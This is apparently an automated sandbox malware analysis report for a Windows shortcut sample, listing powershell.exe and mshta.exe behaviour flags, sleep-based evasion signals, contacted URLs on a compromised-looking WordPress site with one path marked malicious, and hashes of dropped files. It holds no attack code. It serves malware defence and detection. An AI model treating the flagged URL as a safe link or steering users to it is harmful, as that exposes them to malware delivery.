Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4247			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3596			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep count: 4247 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 3596 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7868	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2953865765.000001FF75053000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWl
Source: svchost.exe, 00000005.00000002.2952387664.000001FF6FA2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpu

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Name	Malicious	Reputation
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7	false	unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2	false	unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8	false	unknown
https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1	false	unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1	false	unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2	false	unknown
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2	true	unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2	false	unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2	false	unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2	false	unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5	false	unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2	false	unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2	false	unknown

ID:	1543062
Product:	CloudBasic
Start time:	07:34:06
Start date:	27.10.2024
Sample:	T15hf0Y3mp.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	558ed2a75be9da451504b5ef33eed93c
SHA1:	4c9e126b112ac8c76029e062dbd7d31569e0ce57
SHA256:	b8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73
Filetype:	Windows Shortcut (20020/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	7AF2A5C7445926D05EC1A001EB73F128	246EF56257321726C9C41AD0A2D39DC69E7E12AE	63D51BB8AB4526A0F3FB7634FA995350D476FDC6EF6439FFB181AB5556BC3BE1
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0xfd7f282c, page size 16384, DirtyShutdown, Windows version 10.0	B7BB726DD284C5BBDE0BBE33B4575122	7702C49F0CEEC2BEADBBDA2060F6CEF0202959FF	518C11EA455C4A98FAA8DA7884A227B8D3B6ADAEEDB627895B1B602062B6FC9A
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	99B76EF935912924759C72E9A7053184	119455A0E427DD58B2F27C3EC1F49B9565E7E7F0	F0AB52A4F6C199D1426A6C967A53E91B57474ADED94195F06B71BE22682F6C56
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT	data	0392ADA071EB68355BED625D8F9695F3	777253141235B6C6AC92E17E297A1482E82252CC	B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\awdr_pro[1].js	ASCII text	F4B3CFD8A8AE7BC745695971004BD432	56BCC845FADDB4BB24BB4B361FFCE49BB2803977	CE62B634712417BD24F7B23DA37D2EE5A291ED7452EB9E47384D4F15537F03E7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\by_onsales[1].css	ASCII text	CF3A71F4F059554809A6C493EDAB94B3	9E60E866175163112070257AEE5019A825C8A024	46C9EB24D0DF1F5EBCC4885F9B7EEDC7DE9998FD9052116B25A5F0FD2A90BC97
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\color[1].css	ASCII text	42D8E48001FDAA4FEC9FC10645CC211E	4E776DA85C2361E333E24A642A96B9766A670B83	F56B11F2C3245EB95100FA1B5A7E8102F6D760353962624F0896C77C66423284
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]	HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	939A9FBD880F8B22D4CDD65B7324C6DB	62167D495B0993DD0396056B814ABAE415A996EE	156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\front[1].css	ASCII text	4FE4B3F32BBB6FFA24CCDBCE2BEF4846	B46DF4CB68190E0DD021FBE8DD2345848243EB76	D68EBF618DE4CF4A07601E6BB19B82DE52AC59598C88C26AFF7FCD74BB2ECDB0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\select_radio_check[1].css	ASCII text	F821E43916EBD30DB5D2B3AE8972DDE6	78C66310A2501EE5F163200B6A23CC6233E33A93	3627B01B44AD8B0E399F94E27359DB86E430B5F758E4550BD1004F442F81106F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\site_main[1].js	ASCII text	7237A842DF6FF90E7D924E9493D49796	2B5FF1EC857FEF073ADC6D370C467CE5B1ABFA25	9D58BE93D455EB9E641052F86B28D51A1C47C3283679FD12E5EC457CF2F40161
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\switcher[1].css	ASCII text, with CRLF line terminators	1EBDDED2CCEB731FD3C112FD866A4A1C	EABA5B3711A25AA78D79413D9E6EC915487FCE4A	5A5F1B12C22B8E6462AE9822CBD42E2640F4E8ED8B9382DB6BFFA1C876DA347B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\awdr-dynamic-price[1].js	ASCII text	0624A076A8B15D2D238FB31043BED59C	A1F9ADBCB37555B3ADB1F59666CE22DB51658382	CB8528F82C58653AB48A3C62C296C0E5B8483AB9D53A435D1372D401FD2A63D0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\classic-themes.min[1].css	ASCII text	95E891F28E44A9B314C09545D86BE2B7	F9B13A8BD47273B086A0A07DF15F314E0AF0BC3E	5A5F39391FBF5B06DB84B8F9716D53DE575EE97A627D2C5F12F79A991A671EB5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\error[1]	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	B9BEC45642FF7A2588DC6CB4131EA833	4D150A53276C9B72457AE35320187A3C45F2F021	B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\flatsome-shop[1].css	Unicode text, UTF-8 text, with very long lines (24156)	77A3EFD7056D250655573B14A61D111E	22A4C65BCF6728A849339061E74C4C07D7D136D6	2CAB994EE334C133AC8504B5D0E79F7870DA50590C57DEA956FA76AEBF1562E8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\front[1].css	ASCII text	19B11476F82CF3193C6F110B2D6492A9	A2809C952F3427460F0DB3A35797233E3CC39455	AF757130511C89FBD953546E53CE3D3DFA9F21C674B81F77B72D0EBFAE872533
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\label[1].css	ASCII text	9F98A7262163D20AEDC73AFBAC70DCEA	D8B963AB148CDA48ABB4D2D379BD72737C40E089	093B42292C864BA77AA5523A73EC87D2690D387FFE7F721BD679860C45902727
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\radio[1].css	ASCII text	060DF3EBD0E2F510078B7AD314F23392	93F2663AFB0D4BC2B8009C275F5FBBC6D2F98977	42A3E44E8259E2CEE8F5853D133FAADCDC8C4D0D6A871EDA9C9C7462C799CFD1
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\styles[1].css	ASCII text	0E4A098F3F6E3FAEDE64DB8B9DA80BA2	65B9B3C849F3FBDD783DDBFB183616FF55C7EE53	AB21762C3F447AA08CBEFD5EA3866165F925BD5058A9AE19E23721462DE6FB60
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\by_instock[1].css	ASCII text	42ADACE676F5AABC801213B68DD2F459	79676A1B58DDFBDC18EDED38B5FD608B4AA9A81F	C277FE3B68AD507BA99939F981BAAC6ADE7850FABDAAFF0ACE5334C5A8268700
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\chosen.min[1].css	ASCII text, with very long lines (372)	72E9B866AC4B28674A41F8535A512CCA	33CF8115AA16B4F6AA2C28494DBD5126839E80C0	EA2B40344A11F515E346ED0622BFF12600F3CF80C35D02C538C9CE72E1E5F9EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\customize-table[1].css	ASCII text	B33E17B48C6E4127F08FF901EDC1A3A0	50041C79EC0C509CB8E2A0F207FC5955F86C4F1C	6B7C982887D1C9CD6B5CAC280423EE79929023FA26E8EB440EF99CFF7411813E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gtm4wp-contact-form-7-tracker[1].js	ASCII text, with CRLF line terminators	896AA74695421759DE3F05A1AC46B4B1	4648CA7E1CABF2F952D6EE68431F54A14571E552	9FBA7D93DD3ACEF0467892543BA93147B67CF105757CA84108FE3DD63DE4C4C5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\husky[1].js	C++ source, ASCII text	CD16E3D0613A69792979AA54E0CE6177	631115C445B1098B2A58CC7D7F584051B3A40863	AF3BC439B22149AC67FA17035CE971D9DA6F741985E19151B2057F4DCCACA319
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\quick_search[1].css	ASCII text	2BD8B16C0FA875A954507C9BAF9F5D2C	4DA3759AD67F8CDA6B22B9CC6ED154AC48CC78BB	E05898D46696CD63B11C807D05759CE7EF44156135D194BC46F923713F50F7B3
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\switcher[1].css	ASCII text	1AAC01C7120691B8BA37ACD1C67B89F7	36BAC4F362EB3B24BFAD500E5AA98DDF61A6BCB5	687A6513B3D91EEA53EC2CA5F6431EE6C8BEB7E6AE53D9259DE7673DE1C7D6C9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\warning[1]	GIF image data, version 89a, 36 x 38	124A9E7B6976F7570134B7034EE28D2B	E889BFC2A2E57491016B05DB966FC6297A174F55	5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\awdr_style[1].css	ASCII text	B0AF44348A08900199107155048211B9	97D63FBF5EE0CBE68CD7C8B2D0238DC1456806C1	86298A871666C6F4E59411B98F48F91043AEB724A584F92EF4248DA454955B43
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\by_author[1].css	ASCII text	B1659E76506F38E0B7B3A02016C30508	D7DDC9D8CC5385AEB75E90CD0E052DCE2D0D2517	01B17E190F4E0FAECD59F2A30B4760B083A27B5546BA0672C6586D7C99531DD5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\checkbox[1].css	ASCII text	188CCDBEEA4D10DD60439F916DE74065	DC35E3DD016EB92E17066B01CA62C0F9007EC08C	051E54F3529E73A270DF3EEC7B5141A20241AEF20E1146A564E635E5B99CA1C6
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\flatsome[1].css	ASCII text, with very long lines (65536), with no line terminators	56676AF37B8E946B1BF7587864A50D1B	4E1C02E58A10B2AF1F2AD829E2FFEE454957BB92	8F8D0DF7656637D7D5DFF514745B1BC890013A71B6AB6AEFBE97E6FA1DA14984
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\front[1].css	ASCII text	D76A67545EBE417C0692BF1EC0FE29D9	D332488FA37ECF177C5FAA12398E74A9137B55C8	849D84CFB71A66AB93451B40DDBE4419A6034D7C90B0CF15D6EF9D5A4117F26E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jquery.min[1].js	ASCII text, with very long lines (65447)	17738318D61D394F1DE8890D589AFAEC	F6D0C4DC1399CF02D53F5753AD46573A8BBC2AC3	CC7403BAB52ED166E24EA9324241045AF370BE482F5B594468F4A6AC6E7E7981
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tooltip[1].css	ASCII text	BE1767D1176577B3242B17F4C8D81B02	F9C426E610CA3C4D51E15AE5A5D339EE3242EA5F	A85627770160E545326D46B1E2FD9FA91B1B8AEE846E3982820E99F5178106C4
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	BC6DB77EB243BF62DC31267706650173	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mku24xam.rdi.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4cjefny.qes.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

Windows Analysis Report T15hf0Y3mp.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
T15hf0Y3mp.lnk